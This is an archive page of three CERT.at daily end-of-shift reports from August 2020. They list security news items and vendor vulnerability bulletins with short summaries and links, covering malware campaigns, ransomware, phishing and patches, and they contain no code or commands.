2020 ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-0800 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 10.08.2020
by Daily end-of-shift report 10 Aug '20

10 Aug '20

===================== = End-of-Day report = ===================== Timeframe: Freitag 07-08-2020 18:00 − Montag 10-08-2020 18:00 Handler: Dimitri Robl Co-Handler: Thomas Pribitzer ===================== = News = ===================== ∗∗∗ DDoS attacks in Q2 2020 ∗∗∗ --------------------------------------------- The second quarter is normally calmer than the first, but this year is an exception. The long-term downward trend in DDoS-attacks has unfortunately been interrupted, and this time we are witnessing an increase. --------------------------------------------- https://securelist.com/ddos-attacks-in-q2-2020/98077/ ∗∗∗ Scanning Activity Include Netcat Listener, (Sat, Aug 8th) ∗∗∗ --------------------------------------------- This activity started on the 5 July 2020 and has been active to this day only scanning against TCP port 81. The GET command is always the same except for the Netcat IP which has changed a few times since it started. If you have a webserver or a honeypot listening on TCP 81, this activity might be contained in your logs. --------------------------------------------- https://isc.sans.edu/diary/rss/26442 ∗∗∗ Scoping web application and web service penetration tests, (Mon, Aug 10th) ∗∗∗ --------------------------------------------- Before starting any penetration test, the most important part is to correctly scope it - this will ensure that both the clients expectations are fulfilled and that enough time is allocated to make sure that the penetration test is correctly performed. --------------------------------------------- https://isc.sans.edu/diary/rss/26448 ∗∗∗ Water Nue Phishing Campaign Targets C-Suite’s Office 365 Accounts ∗∗∗ --------------------------------------------- A series of ongoing business email compromise (BEC) campaigns that uses spear-phishing schemes on Office 365 accounts has been seen targeting business executives of over 1,000 companies across the world since March 2020. The recent campaigns target senior positions in the United States and Canada. --------------------------------------------- https://blog.trendmicro.com/trendlabs-security-intelligence/water-nue-campa… ∗∗∗ DEF CON 28: Introduction to ACARS ∗∗∗ --------------------------------------------- This post is a companion to the DEF CON 28 video available here: https://www.youtube.com/watch?v=NFS6qNAi0B8 What is ACARS? ACARS (Aircraft Communications Addressing and Reporting System, pronounced ‘ay-cars’) [...] --------------------------------------------- https://www.pentestpartners.com/security-blog/introduction-to-acars/ ∗∗∗ Small and medium‑sized businesses: Big targets for ransomware attacks ∗∗∗ --------------------------------------------- Why are SMBs a target for ransomware-wielding gangs and what can they do to protect themselves against cyber-extortion? --------------------------------------------- https://www.welivesecurity.com/2020/08/07/small-medium-sized-businesses-big… ===================== = Vulnerabilities = ===================== ∗∗∗ Researcher Demonstrates Several Zoom Vulnerabilities at DEF CON 28 ∗∗∗ --------------------------------------------- Popular video conferencing app Zoom has addressed several security vulnerabilities, two of which affect its Linux client that could have allowed an attacker with access to a compromised system to read and exfiltrate Zoom user data—and even run stealthy malware as a sub-process of a trusted application. --------------------------------------------- https://thehackernews.com/2020/08/zoom-software-vulnerabilities.html ∗∗∗ TeamViewer: Fernwartungstool wies gefährliche Schwachstelle auf ∗∗∗ --------------------------------------------- Wer TeamViewer unter Windows länger nicht aktualisiert hat, sollte dies zügig nachholen: Eine Schwachstelle erlaubt(e) unter Umständen unbefugte Fernzugriffe. --------------------------------------------- https://heise.de/-4866337 ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by CentOS (firefox, java-1.8.0-openjdk, java-11-openjdk, libvncserver, postgresql-jdbc, and thunderbird), Debian (firejail and gupnp), Fedora (cutter-re, postgresql-jdbc, radare2, and webkit2gtk3), openSUSE (chromium, firefox, kernel, and python-rtslib-fb), Oracle (container-tools:ol8, kernel, and nss and nspr), Scientific Linux (thunderbird), and SUSE (firefox, kernel, postgresql10 and postgresql12, python-ipaddress, and xen). --------------------------------------------- https://lwn.net/Articles/828309/ ∗∗∗ Security Bulletin: Security vulnerability affects the Report Builder that is shipped with Jazz Reporting Service (CVE-2020-4541) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerability-af… ∗∗∗ Security Bulletin: Financial Transaction Manager for Check Services is affected by a potential information disclosure id 177835 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-financial-transaction-man… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affects WebSphere Application Server July 2020 CPU that is bundled with IBM WebSphere Application Server Patterns ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Security vulnerability affects the Lifecycle Query Engine that is shipped with Jazz Reporting Service (CVE-2020-4533) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerability-af… ∗∗∗ Security Bulletin: Financial Transaction Manager for Corporate Payment Services is affected by a potential information disclosure id 177835 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-financial-transaction-man… ∗∗∗ Security Bulletin: Vulnerability in IBM Java Runtime affect Financial Transaction Manager for Corporate Payment Services (CVE-2020-2654) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-java… ∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affect Financial Transaction Manager for Check Services (CVE-2019-4732) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja… ∗∗∗ Security Bulletin: Security vulnerability affects the Lifecycle Query Engine that is shipped with Jazz Reporting Service (CVE-2020-4539) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerability-af… ∗∗∗ Security Bulletin: Version 10.19.0 of Node.js included in IBM Netcool Operations Insight 1.6.0.x has several security vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-version-10-19-0-of-node-j… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 07.08.2020
by Daily end-of-shift report 07 Aug '20

07 Aug '20

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 06-08-2020 18:00 − Freitag 07-08-2020 18:00 Handler: Dimitri Robl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Sicherheitslücken: Millionen Smartphones mit Snapdragon-Chip verwundbar ∗∗∗ --------------------------------------------- Der DSP-Prozessor in den weit verbreiteten Snapdragon-Chips von Qualcomm enthält hunderte Sicherheitslücken. --------------------------------------------- https://www.golem.de/news/sicherheitsluecken-millionen-smartphones-mit-snap… ∗∗∗ Exploiting Android Messengers with WebRTC: Part 3 ∗∗∗ --------------------------------------------- Posted by Natalie Silvanovich, Project ZeroThis is a three-part series on exploiting messenger applications using vulnerabilities in WebRTC. CVE-2020-6514 discussed in the blog post was fixed on July 14 with these CLs.This series highlights what can go wrong when applications dont apply WebRTC patches and when the communication and notification of security issues breaks down. --------------------------------------------- https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messenger… ∗∗∗ Spam and phishing in Q2 2020 ∗∗∗ --------------------------------------------- In Q2 2020, the largest share of spam (51.45 percent) was recorded in April. The average percentage of spam in global email traffic was 50,18%, down by 4.43 percentage points from the previous reporting period. --------------------------------------------- https://securelist.com/spam-and-phishing-in-q2-2020/97987/ ∗∗∗ TA551 (Shathak) Word docs push IcedID (Bokbot), (Fri, Aug 7th) ∗∗∗ --------------------------------------------- I've been tracking malicious Word documents from the TA551 (Shathak) campaign This year, we've seen a lot of Valak malware from TA551, but in recent weeks this campaign has been pushing IcedID malware tp English-speaking targets. --------------------------------------------- https://isc.sans.edu/diary/rss/26438 ∗∗∗ Making the Most Out of WLAN Event Log Artifacts ∗∗∗ --------------------------------------------- If you have taken FOR500 (Windows Forensic Analysis) or utilize the FOR500 "Evidence of..." poster, you are probably familiar with the WLAN Event Log listed under the Network Activity/Physical Location section of the poster. This Windows event log (Microsoft-Windows-WLAN-AutoConfig/Operational) records wireless networks that a system has associated with as well as captures network characteristics that can be used for geolocation. In recent testing involving this artifact, a discovery was made that may have implications for investigators. I will outline a scenario that illustrates the issue and present artifacts to help solve it. --------------------------------------------- https://www.sans.org/blog/making-the-most-out-of-wlan-event-log-artifacts/ ∗∗∗ Bypassing MassLogger Anti-Analysis — a Man-in-the-Middle Approach ∗∗∗ --------------------------------------------- The FireEye Front Line Applied Research & Expertise (FLARE) Team attempts to always stay on top of the most current and emerging threats. As a member of the FLARE Reverse Engineer team, I recently received a request to analyze a fairly new credential stealer identified as MassLogger. Despite the lack of novel functionalities and features, this sample employs a sophisticated technique that replaces the Microsoft Intermediate Language (MSIL) at run time to hinder static analysis. --------------------------------------------- http://www.fireeye.com/blog/threat-research/2020/08/bypassing-masslogger-an… ∗∗∗ Stuxnet 2.0: Forscher erwecken alten Security-Alptraum zu neuem Leben ∗∗∗ --------------------------------------------- Auf der Blackhat USA 2020 wiesen Forscher unter anderem auf eine Zero-Day-Lücke im Windows Druckerspoolerdienst hin. Ein Patch von Microsoft soll bald folgen. --------------------------------------------- https://heise.de/-4865010 ∗∗∗ Inter skimming kit used in homoglyph attacks ∗∗∗ --------------------------------------------- Threat actors load credit card skimmers using a known phishing technique called homoglyph attacks. --------------------------------------------- https://blog.malwarebytes.com/threat-analysis/2020/08/inter-skimming-kit-us… ∗∗∗ WordPress Auto-Updates: What do you have to lose? ∗∗∗ --------------------------------------------- A new feature that will allow automatic updating of plugins and themes will be available in WordPress version 5.5, which is scheduled to be released on August 11, 2020. In this core release of the world’s most popular content management system, site owners will have the option to turn auto-updates on for individual plugins and themes directly from the WordPress admin dashboard. --------------------------------------------- https://www.wordfence.com/blog/2020/08/wordpress-auto-updates-what-do-you-h… ∗∗∗ Security Awareness is as valuable today as ever ∗∗∗ --------------------------------------------- A while ago I saw a tweet that initially angered me for many reasons, but then I thought about it and wondered how much effort do companies put in to awareness and training. --------------------------------------------- https://www.pentestpartners.com/security-blog/security-awareness-is-as-valu… ∗∗∗ Zahlreiche Fake-Shops locken mit günstigen Pools, Griller & Terrassenmöbel ∗∗∗ --------------------------------------------- Egal ob im eigenen Pool schwimmen, den Griller anheizen, die Pflanzen pflegen oder einfach auf der Terrasse die Sonne genießen. Sommerzeit ist Gartenzeit. Das sehen auch BetrügerInnen so. Denn derzeit melden LeserInnen der Watchlist Internet zahlreiche Fake-Shops mit Produkten für einen schönen Sommer im Garten. Schauen Sie daher lieber genau auf vermeintliche Online-Shops, die Ihnen günstige Pools, Griller, Terrassenmöbel oder Rasenmäher verkaufen wollen! --------------------------------------------- https://www.watchlist-internet.at/news/zahlreiche-fake-shops-locken-mit-gue… ∗∗∗ Upgrade unseres Ticketsystems 2020-08-07 ∗∗∗ --------------------------------------------- Viele unserer Prozesse laufen über ein Ticketsystem, in unserem Fall ist das RTIR. Es ist jetzt Zeit geworden, hier eine radikalere Umstellung zu machen: Neue Version (Und natürlich wurde prompt während der Testphase eine radikal neue herausgegeben. Seufz.) --------------------------------------------- https://cert.at/de/blog/2020/8/upgrade-unseres-ticketsystem-20200807 ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (clamav and json-c), Fedora (python2, python36, and python37), Red Hat (thunderbird), Scientific Linux (thunderbird), SUSE (java-11-openjdk, kernel, rubygem-actionview-4_2, wireshark, xen, and xrdp), and Ubuntu (openjdk-8 and ppp). --------------------------------------------- https://lwn.net/Articles/828209/ ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: WebSphere MQ Internet Pass-Thru – CVE-2020-2654 (deferred from Oracle Jan 2020 CPU) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-websphere-mq-internet-pas… ∗∗∗ Security Bulletin: Embedded WebSphere Application Server is vulnerable to a command execution vulnerability affect Content Collector for Email ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-embedded-websphere-applic… ∗∗∗ Security Bulletin: A vulnerability in IBM WebSphere Application Server affects IBM Spectrum Scale packaged in IBM Elastic Storage Server (CVE-2019-4720) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-we… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Content Collector for Email is affected by a embedded WebSphere Application Server is vulnerable to a Information Disclosure vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-content-collector-for-ema… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 06.08.2020
by Daily end-of-shift report 06 Aug '20

06 Aug '20

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 05-08-2020 18:00 − Donnerstag 06-08-2020 18:00 Handler: Dimitri Robl Co-Handler: Robert Waldner ===================== = News = ===================== ∗∗∗ Upcoming Security Updates for Adobe Acrobat and Reader (APSB20-48) ∗∗∗ --------------------------------------------- A prenotification security advisory (APSB20-48) has been posted regarding upcoming Adobe Acrobat and Reader updates scheduled for Tuesday, August 11, 2020. --------------------------------------------- https://blogs.adobe.com/psirt/?p=1906 ∗∗∗ Incident Response Analyst Report 2019 ∗∗∗ --------------------------------------------- As an incident response service provider, Kaspersky delivers a global service that results in a global visibility of adversaries’ cyber-incident tactics and techniques on the wild. In this report, we share our teams’ conclusions and analysis based on incident responses and statistics from 2019. --------------------------------------------- https://securelist.com/incident-response-analyst-report-2019/97974/ ∗∗∗ A Fork of the FTCode Powershell Ransomware, (Thu, Aug 6th) ∗∗∗ --------------------------------------------- Yesterday, I found a new malicious Powershell script that deserved to be analyzed due to the way it was dropped on the victims computer. As usual, the malware was delivered through a malicious Word document with a VBA macro. A first observation reveals that its a file less macro. The malicious Base64 code is stored in multiples environment variables that are concatenated then executed through an IEX command... --------------------------------------------- https://isc.sans.edu/diary/rss/26434 ∗∗∗ Ad Hoc Log-Management im Ernstfall (SEC Defence) ∗∗∗ --------------------------------------------- Viele Organisationen, welche kein eigenes Incident Response Team haben, verfügen über keine oder nur sehr mangelhafte Visibility im eigenen Unternehmensnetzwerk. Doch vor Allem für die Aufarbeitung und Behebung des Vorfalls ist es unerlässlich auf allen Systemen angemessene Sichtbarkeit sicherzustellen. --------------------------------------------- https://www.sec-consult.com/./blog/2020/07/ad-hoc-log-management-im-ernstfa… ∗∗∗ PHP Backdoor Obfuscated One Liner ∗∗∗ --------------------------------------------- In the past, I have explained how small one line PHP backdoors use obfuscation and strings of code in HTTP requests to pass attacker’s commands to backdoors. Today, I’ll highlight another similar injection example and describe some of the malicious behavior we’ve seen recently on compromised websites. --------------------------------------------- https://blog.sucuri.net/2020/08/php-backdoor-obfuscated-one-liner.html ∗∗∗ Researcher Demonstrates 4 New Variants of HTTP Request Smuggling Attack ∗∗∗ --------------------------------------------- A new research has identified four new variants of HTTP request smuggling attacks that work against various commercial off-the-shelf web servers and HTTP proxy servers. Amit Klein, VP of Security Research at SafeBreach who presented the findings today at the Black Hat security conference, said that the attacks highlight how web servers and HTTP proxy servers are still susceptible to HTTP request smuggling even after 15 years since they were first documented. --------------------------------------------- https://thehackernews.com/2020/08/http-request-smuggling.html ∗∗∗ Makro-Malware für macOS: Forscher warnt vor unterschätzter Gefahr ∗∗∗ --------------------------------------------- Ein "Office Drama" naht für macOS-User, fürchtet Patrick Wardle. Makro-Malware könnte Schutzmaßnahmen aushebeln, erläuterte der Forscher auf der Black Hat 2020. --------------------------------------------- https://heise.de/-4864148 ===================== = Vulnerabilities = ===================== ∗∗∗ Cisco Security Advisories ∗∗∗ --------------------------------------------- Cisco hat 19 Security Advisories veröffentlicht. Keine der Schwachstellen wird als kritisch eingestuft, vier als "High". --------------------------------------------- https://tools.cisco.com/security/center/Search.x?publicationTypeIDs=1&first… ∗∗∗ Security Bulletin: IBM MQ could allow an attacker to cause a denial of service due to a memory leak caused by an error creating a dynamic queue. (CVE-2020-4375) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-could-allow-an-att… ∗∗∗ Security Bulletin: IBM Java SDK and IBM Java Runtime for IBM i is affected by CVE-2020-2654 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-java-sdk-and-ibm-java… ∗∗∗ Security Bulletin: IBM MQ is affected by a vulnerability within IBM WebSphere Liberty (CVE-2020-4329) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-is-affected-by-a-v… ∗∗∗ Security Bulletin: CVE-2020-2601 may affect IBM® SDK, Java™ Technology Edition ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-2601-may-affect-… ∗∗∗ Security Bulletin: IBM MQ is vulnerable to a buffer overflow vulnerability due to an error within the channel processing code (CVE-2020-4465) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-is-vulnerable-to-a… ∗∗∗ Security Bulletin: Vulnerability CVE-2019-2949 in IBM Java SDK and IBM Java Runtime affects IBM i ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-cve-2019-29… ∗∗∗ Security Bulletin: IBM MQ could allow an attacker to cause a denial of service caused by an error within the pubsub logic. (CVE-2020-4376) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-could-allow-an-att… ∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects IBM SPSS Statistics ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja… ∗∗∗ Security Bulletin: CVE-2020-2590 may affect IBM® SDK, Java™ Technology Edition ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-2590-may-affect-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

Daily